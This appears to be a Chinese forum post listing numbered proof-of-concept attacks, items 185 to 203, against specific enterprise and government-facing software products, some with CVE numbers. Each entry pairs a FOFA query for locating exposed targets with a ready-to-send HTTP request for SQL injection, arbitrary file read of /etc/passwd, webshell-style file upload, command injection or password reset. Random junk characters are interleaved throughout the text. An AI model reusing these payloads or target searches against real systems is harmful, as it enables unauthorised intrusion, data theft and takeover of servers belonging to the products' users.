: W' l% Y3 x4 c" k5 W' @8 u4 S
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')9 s1 |" P ], \1 v+ J/ Z3 m" j- I
/ E9 x* |; G2 r$ d) e5 i
) g0 v# H5 y) n J* I& u4 B185. 瑞友天翼应用虚拟化系统SQL注入/ G+ E8 q* I& x
version < 7.0.5.1
% B( P- H+ w. P( dFOFA:app="REALOR-天翼应用虚拟化系统"
2 Y' s% r$ V! I' i( O' vGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
! k% n. K g0 HHost: host0 f; f' c- _1 i/ N% d' B
$ K# g: K* C" I6 z6 k
5 r+ Y' D* g' p& d, H+ ^
186. F-logic DataCube3 SQL注入
+ [# D3 W+ \2 l; k2 b9 K4 ]CVE-2024-31750; U# F! Q6 U$ C% \/ O8 B4 V7 i8 L
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统* P- Z" J, J6 X* F' l. H
FOFA:title=="DataCube3"
4 @2 d- y7 ^" m8 E* }" K1 w! nPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1: I- H. r1 t6 G/ Y" i, B$ K3 x
Host: your-ip
) i0 \5 E9 K m! O* F* {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0& a- D) @. L% I* U( ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.89 u; Y3 ]6 Z0 j; F( j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* ]3 }+ z2 L, v4 V* W
Accept-Encoding: gzip, deflate9 N+ M1 f: H. ]# t
Connection: close$ C6 X' ~( j3 J; m6 l# r3 Y
Content-Type: application/x-www-form-urlencoded
; q( o% @2 w6 F
4 |% E" i3 R; vreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14500 P5 \' L5 j, c
' i6 O! n; H/ u- [3 [& x# m) Z* `2 b1 P) V# O' S
187. Mura CMS processAsyncObject SQL注入
) D) {3 U* I8 S( R pCVE-2024-32640
, j1 y: |* |4 Y9 g* wFOFA:"Mura CMS"- l. {/ r6 M; x6 k5 T# o8 @9 ?
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1. f5 P. V+ {4 {/ `+ r+ H
Host: your-ip8 {8 C D8 p$ k. Z
Content-Type: application/x-www-form-urlencoded7 N0 y4 Q) W) D
! K: K: s" j" E% Q
2 s% d1 @6 i- p/ Z( ?object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=16 L8 w7 @4 a, V/ J& e0 x' x
& Q: r; n- T" @5 U
, V- W$ t. X4 `6 H" v/ k" Q188. 叁体-佳会视频会议 attachment 任意文件读取, l- U/ I8 \/ c3 I3 r
version <= 3.9.7
! E$ L, M+ X: L( B3 v! @FOFA:body="/system/get_rtc_user_defined_info?site_id"
/ }3 l( U. j: OGET /attachment?file=/etc/passwd HTTP/1.12 S# K: f% S; A4 ^% \# m
Host: your-ip2 p1 \ i% W* l# h; s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 v! L0 S; S p+ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' Q: R, I$ F' a7 H6 q, w
Accept-Encoding: gzip, deflate
$ F0 y7 |+ s% Z8 l# i1 pAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 k0 C3 H1 i: o( e7 p' QConnection: close
! ^6 a1 j }$ K5 ^6 \1 K" l
# `7 { k7 Z2 e, ~5 J' |- ]9 b/ W8 t+ c B, T' N
189. 蓝网科技临床浏览系统 deleteStudy SQL注入 T2 d$ A( A+ D `: c+ n# s, R" g5 [
FOFA:app="LANWON-临床浏览系统"
+ E8 @; }* n( z3 zGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
8 p! O5 F# T7 iHost: your-ip
! H T }8 d; H$ ?- x: v+ e: ^User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: I. u. `. K& }: T; H5 K/ I4 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; j5 h! l, w+ Q: c7 T0 N! ^2 a' N
Accept-Encoding: gzip, deflate* f( w7 W4 l2 A3 o
Accept-Language: zh-CN,zh;q=0.99 ?& s+ t3 ~- M- x' R3 b7 t, }2 X
Connection: close
' x* F& r8 t6 S' N4 A F9 _5 s' S0 W
) r/ w0 ^, m7 i+ ~' S& j3 p+ \* a5 q( c% r. X# K
190. 短视频矩阵营销系统 poihuoqu 任意文件读取% c$ x+ v( E) J o7 L% l
FOFA:title=="短视频矩阵营销系统"
! D$ v6 K1 e& Z# q/ E2 A: }POST /index.php/admin/Userinfo/poihuoqu HTTP/2; ^7 J2 G ?6 o" t/ L0 T( b
Host: your-ip- l6 B6 l# ^+ u8 z1 t: o- H0 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
; g; B1 j, W1 I9 D5 N$ |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! G8 Q* F( b& i. |$ `) GContent-Type: application/x-www-form-urlencoded
1 g) F3 ^( X" j t9 }3 z! BAccept-Encoding: gzip, deflate
# ~. _5 g9 E) s$ _- T) A) BAccept-Language: zh-CN,zh;q=0.9
0 e6 i. ^* G7 @" f: L5 y2 N9 s1 g% l V& Z$ g
poi=file:///etc/passwd; u' }0 z; D k1 I% o9 m
% T ?" r2 M# [0 A' R6 Z
) u4 G, S2 ]# d$ O$ p191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入" h: q( Q5 S ?* e
FOFA:body="/CDGServer3/index.jsp". G. V; h+ o: I( u9 q! `. x$ C
POST /CDGServer3/js/../NavigationAjax HTTP/1.1- E( x5 z- K, A" g, t8 K
Host: your-ip5 Y# P! B r% g! m! B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& W7 S% Z. v9 R: Q6 c) u0 G7 F
Content-Type: application/x-www-form-urlencoded
" S( a8 o' p: p8 H( m
, {5 G) G- y1 N; v5 P( X6 @# w9 \command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
c/ v; S. {; [4 A' l$ O+ l8 C
5 g7 @9 j- ^6 h6 E# O+ F& _1 L5 g! B! P. M( Q1 z
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
3 E9 w4 o7 H$ M% @0 P5 mFOFA:title="用户登录_富通天下外贸ERP"
% p; U- b- ~6 R1 T& J4 kPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
: I2 X# Y- n3 T. s; ZHost: your-ip
( @/ U, V* h& u7 ^/ ^$ i- gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 J4 y8 ]: y7 c+ E. e' N5 s w9 i
Content-Type: application/x-www-form-urlencoded
% y' y/ X( G& n2 i$ K# L( U0 G. P6 S' k: T% Z0 d+ t# x$ m& D
& e$ v: V! V. S) F* Y* o( J8 g
<% @ webhandler language="C#" class="AverageHandler" %>6 }: ?; w4 Z$ b+ I
using System;
) J! j2 p9 r K- z! B$ I @, Nusing System.Web;1 k* t& C( w( Y$ R; B
public class AverageHandler : IHttpHandler& h( r G! V, [& P8 w
{
% T; N z2 T5 kpublic bool IsReusable$ u9 n+ U! a+ E3 O% x' l" z
{ get { return true; } }
1 T: y/ X! @; Kpublic void ProcessRequest(HttpContext ctx)
' o& u" N" F' c. c/ R{, ~$ c) W: [; J+ X9 a
ctx.Response.Write("test");
`, \( ^* n1 V}7 q/ r3 F, d) H6 P4 Q0 j$ c2 y# B6 Q
}1 b1 T; Q( j/ \! l
' s. V' \$ v+ t/ h* t
, F* _# K1 u# z5 n5 C! q: w0 e5 g
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
& ]7 T( B& I' b1 CFOFA:body="山石云鉴主机安全管理系统"9 Y r* R; V" T( g
GET /master/ajaxActions/getTokenAction.php HTTP/1.11 G( n: \2 e/ D( g
Host:: R/ D$ G! }+ i* [3 t9 J' H" D
Cookie: PHPSESSID=2333333333333;; [( ]0 ?! _8 Y! [( ?
Content-Type: application/x-www-form-urlencoded
% q9 C4 y( A, K G; a. v- eUser-Agent: Mozilla/5.0+ h0 X7 S- i" P
: t( O7 P/ g) u
0 A" m& O6 L4 \. e! T* J( v: rPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.12 |" j) V" R% Y3 n6 N: c
Host:& F0 \; V1 I" J6 X4 r
User-Agent: Mozilla/5.02 j5 w @+ g; M. [* j s. Z- k7 C6 h; \
Accept-Encoding: gzip, deflate6 U$ O7 f3 A9 {. C
Accept: */*
4 V# I& M! k/ F9 z0 s$ ]Connection: close; `' L7 P" s# e+ P3 A
Cookie: PHPSESSID=2333333333333;
% n) F6 X4 [" }Content-Type: application/x-www-form-urlencoded% _! x; `1 ^* s( c8 M. z' e
Content-Length: 84
4 O5 F) T9 v( E7 j) | x1 \2 e* y' w
. t2 K; _- s- {; E2 Fparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
5 |8 n7 I; M: p3 A
* M r+ _3 b$ Q( ?, k) H* t+ \1 R5 J/ x7 I. x
GET /master/img/config HTTP/1.1; j, D/ s. g& g F$ s
Host:% P; J6 K; `8 q# C2 u6 k. p9 R) S
User-Agent: Mozilla/5.0: S5 B! T9 u6 H! ?* i
. r: S1 Y; ?( g' o: r
7 ~- z6 ?4 U- T" t: R8 q
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
. M% M: n- Z4 h ]. nFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在0 C! q. a+ q) F% X, L
( W: }! ^: ~& w t9 U$ MPOST /servlet/uploadAttachmentServlet HTTP/1.1
6 ^/ n( \( Y- q, S1 |' R5 RHost: host
6 \+ ~: m$ G9 e M" iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36- R& k- U9 @# v+ v" r2 ?+ i( ^9 w; y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 O5 |$ N6 a( e6 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% @4 ]# a' {: K ~7 i+ y% O+ ~' L' w3 s
Accept-Encoding: gzip, deflate$ G) Q) w# k" c4 W. x
Connection: close+ U8 X1 q3 \. A! [ U8 l6 ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk% T* m1 e$ E1 l* i" X2 X
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
: O; k# I/ O. @
: \* t- ^# Q# G" ?) l9 L, L; uContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
8 n5 [( z6 p) _, N* H$ S) _Content-Type: text/plain
0 a9 Y/ _ C2 S+ m2 }# V6 Z" v/ t<% out.println("hello");%>6 X i6 M, g1 j& Q
------WebKitFormBoundaryKNt0t4vBe8cX9rZk( l1 w; r9 g8 t. G& i
Content-Disposition: form-data; name="json"
" H9 {! V, F. ], s4 { {"iq":{"query":{"UpdateType":"mail"}}}8 O/ M2 _6 {& ?, o+ h3 y
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
V9 D, M) M" R, g/ h5 h" I
6 w* o1 H$ _9 r: v/ J+ u* h, ~+ \" |! F: _. o5 g6 Y0 q7 U; F
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行9 t9 C! `# ?$ V7 ~! ?) e: K# X
FOFA:title=="飞鱼星企业级智能上网行为管理系统
' w/ U% U' y0 _: G* J7 n# ZPOST /send_order.cgi?parameter=operation HTTP/1.1. u- m* b. v/ p7 [/ v* `
Host: 127.0.0.1
( P/ x) `1 t) vPragma: no-cache
6 d5 L- `( ^1 w& X8 L8 nCache-Control: no-cache
5 l$ K, |$ t( u% D' g7 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.365 O, m0 F' p8 O, Y0 L( w5 ?& c9 J
Accept: */*: S) P! a' u" Q9 y: A& ^0 P
Accept-Encoding: gzip, deflate! S, x; F# g' f0 b( T
Accept-Language: zh-CN,zh;q=0.99 n! J! Q+ f A3 M
Connection: close+ a8 ?* d7 h* a. H! s
Content-Type: application/x-www-form-urlencoded
/ L( M' C. |1 s% R( z. O6 GContent-Length: 68
/ C: k: H9 O! Q6 \. G3 n! I( Y0 P$ ]- q! S6 r7 ]# Q
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}5 [; b5 n& I: @/ S) M, ?) t3 C/ z& w
, E1 `( w1 ]- X! [: r/ y
1 Z1 s2 I$ ^* b1 Y+ k4 e" f: {
196. 河南省风速科技统一认证平台密码重置0 y" n" b1 b$ b. }
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
, L- W+ _2 x0 o6 CPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
7 X6 ` S. M, [* E/ f: fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" k' Y( i3 W6 t
Content-Type: application/json;charset=UTF-82 }/ Z6 B! \6 ~7 u! A! |- { V
X-Requested-With: XMLHttpRequest& E5 u& d* Z! a O
Host:( ]) L' t: m4 I) c6 Y, @
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2- Q/ c5 G4 r$ Q# V5 B H) b
Content-Length: 45 p/ }9 v( R0 d- @0 }' `
Connection: close( L: X" B/ X% v5 Z W8 }) j' V# n
Z7 o0 h% N/ [, N$ v7 J! F{"xgh":"test","newPass":"test666","email":""}2 @' x) b+ l9 _6 O2 C/ u
' W' Q5 z! A% b4 U. L, D' S' W
0 R+ Q! I. C! r0 L, R
. R+ z& J6 p- m9 ]9 {+ z- E
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
0 T6 R& x# h' q a* r0 r4 ]/ {5 c( qFOFA:app="浙大恩特客户资源管理系统"
O: i' K- A2 m- N) Q! rGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.19 g/ _2 ^4 Z# v! J# k/ K1 I
Host:" m( Y+ {$ K) |9 A: i0 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
0 A i- n8 i" t3 Q+ g( n& zAccept-Encoding: gzip, deflate
. K+ S0 g! K2 i; |7 G* @% I. W6 [Connection: close
8 W$ X6 i% l- @. r
$ I9 t) x8 T8 L2 N, W3 ?. t( c2 `( ]9 R; N0 W2 C4 N
$ C/ J8 Z+ }, }$ H Z3 Z198. 阿里云盘 WebDAV 命令注入: l5 j O7 ?1 q; p
CVE-2024-29640. w* @. Q6 E: s& d) `
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
8 g% b r; ]/ C' A& I( HCookie: sysauth=41273cb2cffef0bb5d0653592624cf64$ O C" \1 J% U) T1 G
Accept: */*& |' y# B. j, f% w0 R8 q& Z
Accept-Encoding: gzip, deflate
; v4 U5 P$ H% l6 LAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
* k! \& S; C B5 g) QConnection: close" v% S% j/ l9 s+ ~" Q4 v* F
! Q3 X y8 V; ?5 W& R. E5 f% x4 p1 ~% `) H
199. cockpit系统assetsmanager_upload接口 文件上传
& e; l! H$ ?, v& N+ a# T/ F1 V0 ^8 d: V0 E' M6 m/ u
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
& j c4 S8 ]+ K$ {GET /auth/login?to=/ HTTP/1.1
) M' x, w- }. l$ ]2 `3 \5 K c5 h* G1 X
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
& m0 _' g7 ^4 k8 ~, C: s4 ~# ^0 B; e4 G9 l" |1 V
2.使用刚才上一步获取到的jwt获取cookie:8 Z( E4 O) e8 |8 r4 d% x( |& C1 g7 S
1 n; c l, c; C( D2 u. ]" o
POST /auth/check HTTP/1.13 L0 L4 S6 a5 s6 `+ t( N+ f
Content-Type: application/json
# T0 a& ~& N" }# c, \% s
; f1 R% f, y3 x- P% q% z{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}* `, E H) H) n% r/ A" p
1 I# o) T4 R+ _" b; z
响应:200,返回值:/ K B: \/ ^( G! s
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/ v! N, j0 K1 D" B
Fofa:title="Authenticate Please!"! d4 T* m, ]8 M2 g
POST /assetsmanager/upload HTTP/1.1
2 d! \9 C9 R* I7 d; T( H+ JContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
+ z* t. o6 c% C' R$ qCookie: mysession=95524f01e238bf51bb60d77ede3bea92: j& P+ x/ m8 b, `' f5 R" |- H
4 Z8 r. f6 N* W( ], W) x, F
-----------------------------36D28FBc36bd6feE7Fb37 d; x( j3 x* T4 l5 Y/ K; `
Content-Disposition: form-data; name="files[]"; filename="tttt.php"% A0 U, I. C/ D4 R( D9 ?! B0 W6 _
Content-Type: text/php
; r+ \! B0 K: R m
$ d/ c' H0 C0 ~) q<?php echo "tttt";unlink(__FILE__);?>
5 L) k$ S& X. w2 C-----------------------------36D28FBc36bd6feE7Fb33 Z- f2 z2 ~3 t8 j! v% d/ n
Content-Disposition: form-data; name="folder"$ _# B' \( m, ?7 d/ [
, n( L8 |4 Q. o+ u) K
-----------------------------36D28FBc36bd6feE7Fb3--2 ?& @! v1 r% u9 }
6 x R4 m. I' V( }
6 x+ j7 Z( N* { k
/storage/uploads/tttt.php
( U# ^- R. {7 }* L1 X
; K6 a }0 l, A1 Y1 s200. SeaCMS海洋影视管理系统dmku SQL注入
- ]& C* c q, x9 x3 TFOFA:app="海洋CMS"
7 r9 x$ b8 S( L: q- h; HGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1( P; a! c# h; B% f. \# I
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
4 g( |$ Y+ [% d8 P1 e8 b- uUpgrade-Insecure-Requests: 1
2 u" I+ I! T2 C3 T/ A4 ^Cache-Control: max-age=0
) m8 Z1 ^# `" H/ ~* v1 o3 g$ SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 o. O9 Q% c; f; T
Accept-Encoding: gzip, deflate
& o) O' a* [; r% B8 x* u# F( iAccept-Language: zh-CN,zh;q=0.9
2 U- ^6 B& P; l6 c& m& G
% W9 u7 n% G$ Z
, u! ^2 w% m# Q( q5 r201. 方正全媒体新闻采编系统 binary SQL注入
( f# M3 J/ A$ y& ]+ p5 D6 S! k# kFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"5 U! ]+ Z4 J7 E3 G3 T( L
POST /newsedit/newsplan/task/binary.do HTTP/1.1
( c! H- Q g: t% r$ p: d: B @Content-Type: application/x-www-form-urlencoded
2 T; u' [1 x1 N+ h0 v WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* F* m) ^- v0 p- t0 A9 Z
Accept-Encoding: gzip, deflate/ F! ~4 ?% X2 s( x c1 S; n
Accept-Language: zh-CN,zh;q=0.9
) {* z- a e& f, E- d- _Connection: close
5 `# z6 m6 @6 v% J6 f1 H
% F7 w, \3 T2 E) VTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
+ R; G. b' C/ y# c# j: g; B: Y1 F, B, |
2 Z9 G6 C& j) w, `9 ~' q
202. 微擎系统 AccountEdit任意文件上传. S1 D6 O# k& Z- Y4 v/ L
FOFA:body="/Widgets/WidgetCollection/"
4 E- K- }8 ^6 T9 }/ ?获取__VIEWSTATE和__EVENTVALIDATION值) i: T5 v" V" X4 X$ P- _8 F7 K
GET /User/AccountEdit.aspx HTTP/1.1: k2 _+ }' N0 S4 C& D4 e
Host: 滑板人之家
5 |# C! w( H! \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.315 Z/ {/ d4 Z7 y% f7 G5 J8 C
Content-Length: 06 a) {. n+ m' O/ W7 b1 l/ H5 u
, f; a4 t: v- Y
2 x: [ c# N& X f替换__VIEWSTATE和__EVENTVALIDATION值, u0 N: m& b% M% [
POST /User/AccountEdit.aspx HTTP/1.1% S' n0 q6 h6 k( F& W
Accept-Encoding: gzip, deflate, br
. w! b* N- n% |/ X8 wContent-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356873 Q4 P/ R" E) k8 F$ J$ e: ]
. ~! |, Y1 R) [( ]0 X3 V# M-----------------------------786435874t38587593865736587346567358735687
/ v8 b3 s& P. q7 `, U$ k0 tContent-Disposition: form-data; name="__VIEWSTATE"1 z8 n* G8 Z$ \% P
* ^$ j) d1 l0 O Q& |
__VIEWSTATE
9 w8 E F6 @8 x! c% n" o-----------------------------786435874t38587593865736587346567358735687 s) g& m- ?8 w# X, x: e8 ^$ K
Content-Disposition: form-data; name="__EVENTVALIDATION". Q; m# g' D0 I% P Y9 z
& A& K0 [8 N) S$ ?9 x, y1 S7 e, @
__EVENTVALIDATION* X7 f& ^2 h3 R1 n4 z
-----------------------------786435874t38587593865736587346567358735687, p' y. N. g8 o; C$ t6 G( F
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"1 S% c4 ]: ]( j; r% s7 {
Content-Type: text/plain+ @. M7 [' n$ L
1 A. }/ M5 A* I9 ?7 j) c- l
Hello World!! o0 ~7 u7 ^, b
-----------------------------786435874t38587593865736587346567358735687
9 x* S, z1 ^( o/ `Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
0 `& {% w4 _* o3 [5 @ m$ I, y$ O% k8 t; K7 _/ z/ v
上传图片
$ l' h7 |! q6 @3 J, g-----------------------------786435874t38587593865736587346567358735687- n; H5 [$ d m* m4 E
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( C7 A9 l5 X& H2 P- s- w8 r! P( K. i% }) N7 R
! [3 v/ d& U. K j8 Q- S2 \- V" l
-----------------------------786435874t38587593865736587346567358735687
8 W7 S/ I8 e, ^6 [1 T6 H0 pContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"! [2 a- ]( o8 X _
$ Q9 A( N3 A6 e* N$ ]
' y# F. ?' s- a' X( j
-----------------------------786435874t38587593865736587346567358735687--4 D) O; C9 S e7 |0 N; U3 Y
9 U" ~1 M/ p7 H* H$ h [1 R% B9 J1 n3 J8 ~4 H3 P
/_data/Uploads/1123.txt
2 T3 U. E$ h# `! U e1 Q" d
" }/ u( t$ c% W% G* P8 Q2 L203. 红海云EHR PtFjk 文件上传; j6 h% o5 ] |1 t, \3 e
FOFA:body="RedseaPlatform"
- B! f7 K7 P; O6 LPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1+ E' ]: O7 G8 P. i" D) ~
Host: x.x.x.x
+ E% w8 u1 U1 V5 I" \; ]5 lAccept-Encoding: gzip4 s+ h2 X- v. D* d i9 k- M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 K' x) S* Q M1 ~; LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
: D+ ?# U' x) \5 j4 qContent-Length: 210, f( y ~: B! g% U
; [2 g6 _1 V" ~# w------WebKitFormBoundaryt7WbDl1tXogoZys41 M" E. P1 W' c* @2 @
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
2 M- K& W$ `9 BContent-Type:image/jpeg
) u! w, h- ?% a6 M! U9 q& C* \7 H+ f3 c2 I$ N
<% out.print("hello,eHR");%>; Z- G, b- m) a6 X, `- ~
------WebKitFormBoundaryt7WbDl1tXogoZys4--
; I* k! n/ d1 R+ |# g4 z& L7 U# s8 N3 h$ X
9 \/ p, n7 x8 y7 [7 @' z" I, F
( K$ c5 O, n6 D8 n7 E3 R) z* I; E
/ ~' [/ s* N3 n( N7 c
1 \" T5 E% A# P1 {. A5 ?/ T# k# M& F* J6 ^5 Q ~
|
发表于 2024-6-5 14:31:29
收藏
支持
反对